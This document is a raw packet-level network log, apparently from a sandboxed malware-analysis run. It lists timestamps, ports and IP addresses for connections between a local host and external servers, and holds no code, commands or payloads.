Jan 5, 2025 08:32:59.837758064 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.837804079 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.837812901 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.837857008 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.837866068 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.837899923 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.837908983 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.837954998 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.837964058 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.838044882 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.838053942 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.838289022 CET	7346	49741	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:59.838660955 CET	49741	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:33:03.552763939 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:33:03.554109097 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:33:03.558911085 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:33:07.694545984 CET	49770	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:33:07.712080002 CET	49769	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:33:07.725399017 CET	49771	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:33:07.725425959 CET	49772	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:33:10.996706009 CET	49723	80	192.168.2.4	199.232.210.172
Jan 5, 2025 08:33:10.996808052 CET	49724	80	192.168.2.4	199.232.210.172
Jan 5, 2025 08:33:11.001691103 CET	80	49723	199.232.210.172	192.168.2.4
Jan 5, 2025 08:33:11.002024889 CET	80	49724	199.232.210.172	192.168.2.4
Jan 5, 2025 08:33:11.002080917 CET	49723	80	192.168.2.4	199.232.210.172
Jan 5, 2025 08:33:11.002093077 CET	49724	80	192.168.2.4	199.232.210.172
Jan 5, 2025 08:33:16.051831007 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:16.051865101 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:16.051943064 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:16.052355051 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:16.052370071 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:16.507647038 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:16.507728100 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:16.509603024 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:16.509612083 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:16.509912968 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:16.510932922 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:16.555330992 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.776031971 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.776124001 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.776179075 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.776217937 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.776242018 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.776755095 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.776787996 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.776804924 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.776810884 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.776827097 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.824728966 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.850891113 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.851021051 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.851106882 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.851118088 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.851161003 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.853349924 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.853359938 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.862690926 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.862751007 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.862760067 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.862845898 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.863055944 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.863101006 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.863106012 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.863143921 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.863303900 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.863456964 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.863497019 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.863539934 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.863547087 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.863593102 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.864108086 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.864178896 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.864303112 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.864343882 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.864348888 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.864387035 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.865111113 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.907135010 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.938043118 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.938136101 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.938175917 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.938210011 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.938219070 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.938230991 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.938266039 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.938379049 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.938421011 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.938421965 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.938429117 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.938468933 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.938477993 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.949367046 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.949398041 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.949457884 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.949465990 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.949508905 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.949512959 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.949630976 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.949815035 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.949865103 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.949871063 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.949912071 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.950565100 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.950618982 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.951021910 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.951081991 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.951176882 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.951217890 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.951916933 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.951961040 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.952092886 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.952142000 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.952769995 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:17.952816963 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.966340065 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:17.966370106 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.007087946 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.007149935 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.024385929 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.024440050 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.024638891 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.024693966 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.024918079 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.024962902 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.025206089 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.025254965 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.036128998 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.036196947 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.036544085 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.036596060 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.036634922 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.036681890 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.036940098 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.036990881 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.037431002 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.037489891 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.037542105 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.037591934 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.037755013 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.037800074 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.038446903 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.038485050 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.038502932 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.038513899 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.038539886 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.038559914 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.039246082 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.039300919 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.039318085 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.039366007 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.039534092 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.039583921 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.040098906 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.040153980 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.040272951 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.040324926 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.040523052 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.040570021 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.095244884 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.095310926 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.095310926 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.095328093 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.095351934 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.095376015 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.095504045 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.095547915 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.111128092 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.111196995 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.111433983 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.111469984 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.111478090 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.111483097 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.111510038 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.111530066 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.111754894 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.111800909 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.111953020 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.111994982 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.112016916 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.112060070 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.112298012 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.112339020 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.122828960 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.122886896 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.123266935 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.123322010 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.123454094 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.123496056 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.124140024 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.124145985 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.124185085 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.124205112 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.124212027 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.124222994 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.124249935 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.124576092 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.124594927 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.124627113 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.124633074 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.124659061 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.124676943 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.125360966 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.125376940 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.125433922 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.125439882 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.125484943 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.126161098 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.126178026 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.126235008 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.126240969 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.126281023 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.180670977 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.180691004 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.180747032 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.180773020 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.180784941 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.180810928 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.198002100 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.198024988 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.198069096 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.198076963 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.198102951 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.198121071 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.198699951 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.198715925 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.198771954 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.198777914 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.198817015 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.209918976 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.209940910 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.209975958 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.209980965 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.210019112 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.210469007 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.210484982 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.210541964 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.210547924 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.210591078 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.211302996 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.211329937 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.211360931 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.211365938 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.211395979 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.211410999 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.211807013 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.211822033 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.211868048 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.211874962 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.211901903 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.211916924 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.214643955 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.214662075 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.214699030 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.214704990 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.214731932 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.214751005 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.267276049 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.267323017 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.267338991 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.267359018 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.267369986 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.267399073 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.267404079 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.284842014 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.284866095 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.284904957 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.284912109 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.284941912 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.285300970 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.285315037 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.285342932 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.285352945 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.285377979 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.296713114 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.296735048 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.296762943 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.296767950 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.296811104 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.296816111 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.296852112 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.297224045 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.297240019 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.297271013 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.297275066 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.297303915 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.297319889 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.297971010 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.297986984 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.298038006 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.298043966 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.298079014 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.298600912 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.298615932 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.298656940 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.298660994 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.298688889 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.298712969 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.298717022 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.299201965 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.299221039 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.299253941 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.299257994 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.299284935 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.340768099 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.340775967 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.354124069 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.354162931 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.354186058 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.354191065 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.354223013 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.371659994 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.371680975 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.371718884 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.371727943 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.371778011 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.372298956 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.372335911 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.372361898 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.372366905 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.372400999 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.383804083 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.383826017 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.383860111 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.383868933 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.383899927 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.384541988 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.384561062 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.384603977 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.384610891 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.384638071 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.385040045 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.385059118 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.385088921 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.385092974 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.385118961 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.385585070 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.385601044 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.385643959 CET	49903	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:33:18.385647058 CET	443	49903	188.114.96.3	192.168.2.4
Jan 5, 2025 08:33:18.385657072 CET	443	49903	188.114.96.3	192.168.2.4
